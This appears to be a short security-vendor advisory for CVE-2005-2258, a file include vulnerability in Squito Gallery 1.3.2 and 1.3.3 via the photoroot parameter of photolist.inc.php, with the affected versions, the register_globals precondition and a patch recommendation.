This application requires Javascript for optimal performance.

Squito.Gallery.Photolist.inc.php.File.Include

Release Date

Aug 05, 2005

Severity

low

Impact

Compromise of the affected system.

Description

It indicates a possible exploit of file include vulnerability in Squito Gallery.



Squito Gallery is an open source gallery management application written in PHP, uses MySQL as backend database. A vulnerability is reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable server. This is due to photolist.inc.php script failure to sanitize value passed to photoroot parameter on a request. For exploiting this an attacker may convince a victim to click a malicious URL link to include and execute arbitrary files from external and local resources. Successful exploitation requires that "register_globals" is enabled.



Affected Products

Squito Gallery 1.3.3 and Squito Gallery 1.3.2.

Recommended Actions

Apply appropriate patch from the vendor if available or upgrade to non-vulnerable version.

Coverage

IPS
VCM

Common Vulnerabilities and Exposures (CVE)

CVE-2005-2258

Reference/s

http://www.securityfocus.com/bid/14219 (BugTraq)

Reference: VID-10390